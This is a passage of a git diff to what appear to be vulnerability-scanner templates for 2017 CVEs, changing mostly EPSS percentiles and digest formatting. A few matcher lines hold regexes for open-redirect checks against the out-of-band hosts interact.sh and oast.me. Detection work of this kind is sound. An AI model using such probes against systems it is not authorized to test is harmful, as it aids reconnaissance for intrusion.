b/http/cves/2017/CVE-2017-11629.yaml index 61af94e8c0..5131b73b5f 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40998 + epss-percentile: 0.41024 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d639733acf05d35fb75b04fdc10a84984a06b091bbfb623abd210a6ce700a3e0220131d91e2872842c75a6cf4f3249ec0e62de79fbe549c3871fd8b93a76d10d48b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200d639733acf05d35fb75b04fdc10a84984a06b091bbfb623abd210a6ce700a3e0220131d91e2872842c75a6cf4f3249ec0e62de79fbe549c3871fd8b93a76d10d48b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 20ef94d911..368a916b3f 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24771 + epss-percentile: 0.24786 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 @@ -43,4 +43,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4b0a004830460221009eecd3f1b4721cba9227114d76ff8ff2d14e6f3713c8269a9ca324dec2daa8d7022100bf5ddba78b836692ef9e88a43415141e53dc9752cd0711d68f5441bcb34ce25b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221009eecd3f1b4721cba9227114d76ff8ff2d14e6f3713c8269a9ca324dec2daa8d7022100bf5ddba78b836692ef9e88a43415141e53dc9752cd0711d68f5441bcb34ce25b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 164785b52a..3395afe27c 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-12149 cwe-id: CWE-502 epss-score: 0.9719 - epss-percentile: 0.99751 + epss-percentile: 0.99753 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 0741a47092..e7d42ec06e 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -49,4 +49,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100daba5a1cc2357fc0763be3bb7503fdfe85015a68a8d68776b5ca896df5117bab02204482b94257875298db8c981ed3c47661c0d4cb6974d9548cf68082c8725ca8fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100daba5a1cc2357fc0763be3bb7503fdfe85015a68a8d68776b5ca896df5117bab02204482b94257875298db8c981ed3c47661c0d4cb6974d9548cf68082c8725ca8fa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 584b1511f1..d39351f562 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99536 + epss-percentile: 0.99538 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008862d6721fb603eb07866264705682a871cbc22f89e0e9af8418f07998ad4e320220293324532d9ec219add1fd6e07655c469014fb586f1f869717412d53ec7f1129:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008862d6721fb603eb07866264705682a871cbc22f89e0e9af8418f07998ad4e320220293324532d9ec219add1fd6e07655c469014fb586f1f869717412d53ec7f1129:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index c8ca1335b2..e52e4e3164 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40998 + epss-percentile: 0.41024 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d1d47fd7019306e293cd07cf3e28b4e36047b53b3fccc7a301b42a0169e5ed09022100b8563f0a7a2067d4afeb2657860f5d2b6ddcbc2a9653cd30d22c605fbfda37eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d1d47fd7019306e293cd07cf3e28b4e36047b53b3fccc7a301b42a0169e5ed09022100b8563f0a7a2067d4afeb2657860f5d2b6ddcbc2a9653cd30d22c605fbfda37eb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 4ce40f8299..ca8cb9c5af 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -67,4 +67,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a30af760e70c24b665a41b2604353b54fa16bd1cd43de4d17d333962abf1aabc02201d38f1d569f98e31541b1f2634c21c416a707c765902a4610555cc629602faa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a30af760e70c24b665a41b2604353b54fa16bd1cd43de4d17d333962abf1aabc02201d38f1d569f98e31541b1f2634c21c416a707c765902a4610555cc629602faa2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index f913c52819..541b570774 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9029690673eb169f900af685604791db5bbf74e150b0abaeb5fd45ad8be4cdb0220275ae2928f1d805d99ff0dfe2f54b39361431d61d390e6c91a24e58f84ace1b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c9029690673eb169f900af685604791db5bbf74e150b0abaeb5fd45ad8be4cdb0220275ae2928f1d805d99ff0dfe2f54b39361431d61d390e6c91a24e58f84ace1b2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 588207a6df..2e14d52f73 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-12635 cwe-id: CWE-269 epss-score: 0.97516 - epss-percentile: 0.99983 + epss-percentile: 0.99982 cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 33bb391810..a56ac8553b 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12637 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.77062 + epss-percentile: 0.77074 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ccd9133c6e49d823a7aeed6062011ca864c61a9b79a65164dc1d73b49011f517022100d68d7359ffbeef04e40ae938cc181359ab7fb2be2ce0096628c79680e7ef6f47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ccd9133c6e49d823a7aeed6062011ca864c61a9b79a65164dc1d73b49011f517022100d68d7359ffbeef04e40ae938cc181359ab7fb2be2ce0096628c79680e7ef6f47:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 1c5272d165..a13db6e428 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.5975 + epss-percentile: 0.5977 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ed5dddace7c1400795650837bba3e9810a388d132a6a6dc404744a9795073a7c02204e4bed5e6f399d0e54ffa5a60a1e1bba5d23ed6018767d78c46095f4c6228c73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100ed5dddace7c1400795650837bba3e9810a388d132a6a6dc404744a9795073a7c02204e4bed5e6f399d0e54ffa5a60a1e1bba5d23ed6018767d78c46095f4c6228c73:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 499a138c12..e46128e8f8 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99517 + epss-percentile: 0.99519 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220092147013e94c8a37c1488fba6715a1dbb908721466fca4b34673d44a5a740c502205916fd48651a5a138343c29197d9f29638b3963615a972aa1d8f048ee7ea61df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220092147013e94c8a37c1488fba6715a1dbb908721466fca4b34673d44a5a740c502205916fd48651a5a138343c29197d9f29638b3963615a972aa1d8f048ee7ea61df:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 3a1e610375..18a337e3dc 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - epss-percentile: 0.89737 + epss-percentile: 0.89746 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true @@ -50,4 +50,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e43f4b70d2a69130ddd316b849778af936f2c35058c44c136f2429c95ef9d22022062b7c1c5a6ffb9b9be4bec26f39bb4a4f8178ce4047a1c3db515b3cde353eb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207e43f4b70d2a69130ddd316b849778af936f2c35058c44c136f2429c95ef9d22022062b7c1c5a6ffb9b9be4bec26f39bb4a4f8178ce4047a1c3db515b3cde353eb35:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 78cf3c772b..a0a0677df0 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.6336 + epss-percentile: 0.63377 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' -# digest: 4a0a00473045022100a585e46c709bff7b64a86a5e2dde7c7e6d2332ef254236d1a6796d3b7fc34703022006a4b78a46d595e43d21b076570db22d8cca666a386d08eeb50aeba7b8543cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a585e46c709bff7b64a86a5e2dde7c7e6d2332ef254236d1a6796d3b7fc34703022006a4b78a46d595e43d21b076570db22d8cca666a386d08eeb50aeba7b8543cc4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 9f97a68eb7..6ff35a0b72 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91476 + epss-percentile: 0.91483 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f0f72e7a900191d3916954ecf14eac13f6a03e7eec891dd4ed85dd14339cfd5f02203e1192492127d658c27b29b5fbe27c902ad6bf993878ad1eca4bcd6773f82d98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f0f72e7a900191d3916954ecf14eac13f6a03e7eec891dd4ed85dd14339cfd5f02203e1192492127d658c27b29b5fbe27c902ad6bf993878ad1eca4bcd6773f82d98:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14537.yaml b/http/cves/2017/CVE-2017-14537.yaml index 135d69f2b5..c96def07d8 100644 --- a/http/cves/2017/CVE-2017-14537.yaml +++ b/http/cves/2017/CVE-2017-14537.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14537 cwe-id: CWE-22 epss-score: 0.01002 - epss-percentile: 0.81996 + epss-percentile: 0.82014 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 2 @@ -56,4 +56,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008a74afe3539a56cbef60ea7de9e486b38227cb2d80f4a512f2f05d825f245477022004b89e016ee5b8cc47929ce40767fde657287a01e80a58faa945e29cfcf62680:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221008a74afe3539a56cbef60ea7de9e486b38227cb2d80f4a512f2f05d825f245477022004b89e016ee5b8cc47929ce40767fde657287a01e80a58faa945e29cfcf62680:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index cc3d71f6dc..6c1550838b 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.48501 + epss-percentile: 0.48527 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "2kb-amazon-affiliates-store")' condition: and -# digest: 4a0a00473045022100d9f0d7b1563de7cab3593f62d60a8f2eb39ca1367f4487b49c920e7c1421268202206809f6d7484a748ba2fe5adf308f61dfa534b64fcc8ba1b6986e3860243be315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d9f0d7b1563de7cab3593f62d60a8f2eb39ca1367f4487b49c920e7c1421268202206809f6d7484a748ba2fe5adf308f61dfa534b64fcc8ba1b6986e3860243be315:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index b5f4794bb9..e5f69d43b7 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.50081 + epss-percentile: 0.50104 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -44,4 +44,5 @@ http: part: header words: - "text/html" -# digest: 4b0a00483046022100e519f80831bfd89b680e203512c7a31258a659d11b7ea9fc403ddf0b9f09d03d022100a380c52bfe20015eb905d4e67bf9d376db6a67b04d8c5046e079447d3bd1f294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100e519f80831bfd89b680e203512c7a31258a659d11b7ea9fc403ddf0b9f09d03d022100a380c52bfe20015eb905d4e67bf9d376db6a67b04d8c5046e079447d3bd1f294:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index bcf39d9643..c21b46bfae 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96872 - epss-percentile: 0.99599 + epss-percentile: 0.99601 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e59ac79badefdbb0d4ab80499280d3e69dce9b0b286891d886003026b39d4e202206f144c81931430686b5e58c2a6e7635a86ae0ad7d739541edd810545075b69e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207e59ac79badefdbb0d4ab80499280d3e69dce9b0b286891d886003026b39d4e202206f144c81931430686b5e58c2a6e7635a86ae0ad7d739541edd810545075b69e4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 44f24532a3..5a85cb2559 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.47373 + epss-percentile: 0.47398 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: word words: - 'Unknown command: ' -# digest: 4a0a00473045022100d762f21481ad84f58c1adda5155f8bf6ecea2e336fdb37f8dcb103f5017f27250220330bdab079fa818dffe2bdbfca0181c3c0c4df051b0b53702483f070c5324ca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d762f21481ad84f58c1adda5155f8bf6ecea2e336fdb37f8dcb103f5017f27250220330bdab079fa818dffe2bdbfca0181c3c0c4df051b0b53702483f070c5324ca3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15363.yaml b/http/cves/2017/CVE-2017-15363.yaml index e9f7ef0d08..9e0678fa3a 100644 --- a/http/cves/2017/CVE-2017-15363.yaml +++ b/http/cves/2017/CVE-2017-15363.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-15363 cwe-id: CWE-22 epss-score: 0.04393 - epss-percentile: 0.91415 + epss-percentile: 0.91421 cpe: cpe:2.3:a:luracast:restler:*:*:*:*:*:typo3:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022039e37777f4b272790740fa24df9eda90e5ce14f54083b473bd207a3893047881022100f551f8279f8a8abaffd134ff691a22272095ee2056f10a0ff4f0925bacc6e497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022039e37777f4b272790740fa24df9eda90e5ce14f54083b473bd207a3893047881022100f551f8279f8a8abaffd134ff691a22272095ee2056f10a0ff4f0925bacc6e497:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15647.yaml b/http/cves/2017/CVE-2017-15647.yaml index 37d3bdb786..a2a188c4c8 100644 --- a/http/cves/2017/CVE-2017-15647.yaml +++ b/http/cves/2017/CVE-2017-15647.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-15647 cwe-id: CWE-22 epss-score: 0.02013 - epss-percentile: 0.87646 + epss-percentile: 0.87655 cpe: cpe:2.3:o:fiberhome:routerfiberhome_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bc41d617eb8586dd7eabc07189a3ef0f7b16e8fb374eedfeedba8d7e49866ec702207ec35fe3f135335af5dee6da4c1ab8ce1cebce93623716b2af2ba1abddeb99a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100bc41d617eb8586dd7eabc07189a3ef0f7b16e8fb374eedfeedba8d7e49866ec702207ec35fe3f135335af5dee6da4c1ab8ce1cebce93623716b2af2ba1abddeb99a4:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 17238ff6d8..57867ee810 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-15715 cwe-id: CWE-20 epss-score: 0.97023 - epss-percentile: 0.99661 + epss-percentile: 0.99663 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 2 @@ -55,4 +55,5 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 4a0a00473045022100b868709ad23713747b15b2427a996dbe1ebb3a67de531be1276cf013558a5afe02203e254746edf4da5502af55647c31bf140ed2f9991519c67d22210cf91e7a39c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b868709ad23713747b15b2427a996dbe1ebb3a67de531be1276cf013558a5afe02203e254746edf4da5502af55647c31bf140ed2f9991519c67d22210cf91e7a39c7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index b410fb0281..7ae0cec21f 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2017-15944 epss-score: 0.97377 - epss-percentile: 0.99878 + epss-percentile: 0.99879 cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 3c02aefd96..1fb2ac75b9 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07105 - epss-percentile: 0.93255 + epss-percentile: 0.93263 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035506dfcabfb9c46d5bcdf5e68cab4bd73ca3a0626d424f178343a4754a305120221009bf6d79184876e72ca7bd6a3e54cb926e9d550f36953067e5f9fb87d256769fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022035506dfcabfb9c46d5bcdf5e68cab4bd73ca3a0626d424f178343a4754a305120221009bf6d79184876e72ca7bd6a3e54cb926e9d550f36953067e5f9fb87d256769fc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 00a782bf25..60ae6fd1fc 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-16877 cwe-id: CWE-22 epss-score: 0.0032 - epss-percentile: 0.67303 + epss-percentile: 0.67319 cpe: cpe:2.3:a:zeit:next.js:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c9f28130e69645f6308fe24a70a2e16b29f56de3a0fb02bbb48802e2aa4d11d1022100d60867d1f07153e21c086f8ffd6e085adc2586f260ed6442650245851da0b9b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c9f28130e69645f6308fe24a70a2e16b29f56de3a0fb02bbb48802e2aa4d11d1022100d60867d1f07153e21c086f8ffd6e085adc2586f260ed6442650245851da0b9b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index c96813f999..6c4f5741aa 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-16894 cwe-id: CWE-200 epss-score: 0.29151 - epss-percentile: 0.96359 + epss-percentile: 0.96363 cpe: cpe:2.3:a:laravel:laravel:*:*:*:*:*:*:*:* metadata: verified: true @@ -54,4 +54,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022001c9c9cf47c92f70fda66af061a7688bd0c62cef39fd123da815088a2bff1c66022100f8ce2218d6f9089b50ae832adb57966ccd8aa9dff033a7b04d4874ffa1fbbc32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022001c9c9cf47c92f70fda66af061a7688bd0c62cef39fd123da815088a2bff1c66022100f8ce2218d6f9089b50ae832adb57966ccd8aa9dff033a7b04d4874ffa1fbbc32:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index c94e5c78cc..b1c137425c 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62329 + epss-percentile: 0.62347 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022048e87c3e8141b06f628be734ffdff0abebb4925addffb045bb992945db89601d022100a2f33bbb3de41f0831e7323f79765ecc58977084ff519d8a38a51dd36be03e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022048e87c3e8141b06f628be734ffdff0abebb4925addffb045bb992945db89601d022100a2f33bbb3de41f0831e7323f79765ecc58977084ff519d8a38a51dd36be03e42:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index b41f014ef5..995ec1138b 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-17059 cwe-id: CWE-79 epss-score: 0.00261 - epss-percentile: 0.6367 + epss-percentile: 0.63686 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c5f7720ccdddcfda621975443042ef337352ba9cb8606114359aa7e5f8251f4b022023599fe59518976df111ae70bbc0324cc70531e7a3097bae2a7d3df97c08f2f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c5f7720ccdddcfda621975443042ef337352ba9cb8606114359aa7e5f8251f4b022023599fe59518976df111ae70bbc0324cc70531e7a3097bae2a7d3df97c08f2f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 1bfd00eccd..8b64493d23 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54917 + epss-percentile: 0.54933 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022034ab79be484bdd6a9b31ffa50acacdca1b8079180d3f3b34ab23e88916df823802206f1902e31dabfb870f41ad14b1a910d98e0fa784dfc0dc3fc027a9ad2843f5cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022034ab79be484bdd6a9b31ffa50acacdca1b8079180d3f3b34ab23e88916df823802206f1902e31dabfb870f41ad14b1a910d98e0fa784dfc0dc3fc027a9ad2843f5cc:922c64590222798bb761d5b6d8e72950 diff 